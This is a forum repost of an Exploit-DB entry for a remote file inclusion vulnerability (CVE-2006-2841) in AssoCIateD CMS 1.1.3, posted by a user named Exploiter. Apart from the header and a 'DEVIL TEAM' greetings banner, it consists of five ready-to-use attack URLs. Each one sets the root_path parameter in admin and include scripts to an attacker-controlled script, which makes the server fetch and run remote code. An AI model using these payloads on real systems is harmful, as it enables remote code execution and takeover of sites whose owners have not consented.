Exploit AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1858
Проверка EDB
  1. Пройдено
Автор
KACPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2841
Дата публикации
2006-06-01
Код:
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
# Script site: http://herve.labas.free.fr/acid/en/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: [email protected]   or   http://www.devilteam.yum.pl
#
##################################################################


http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]

# milw0rm.com [2006-06-01]
 
Источник
www.exploit-db.com

Похожие темы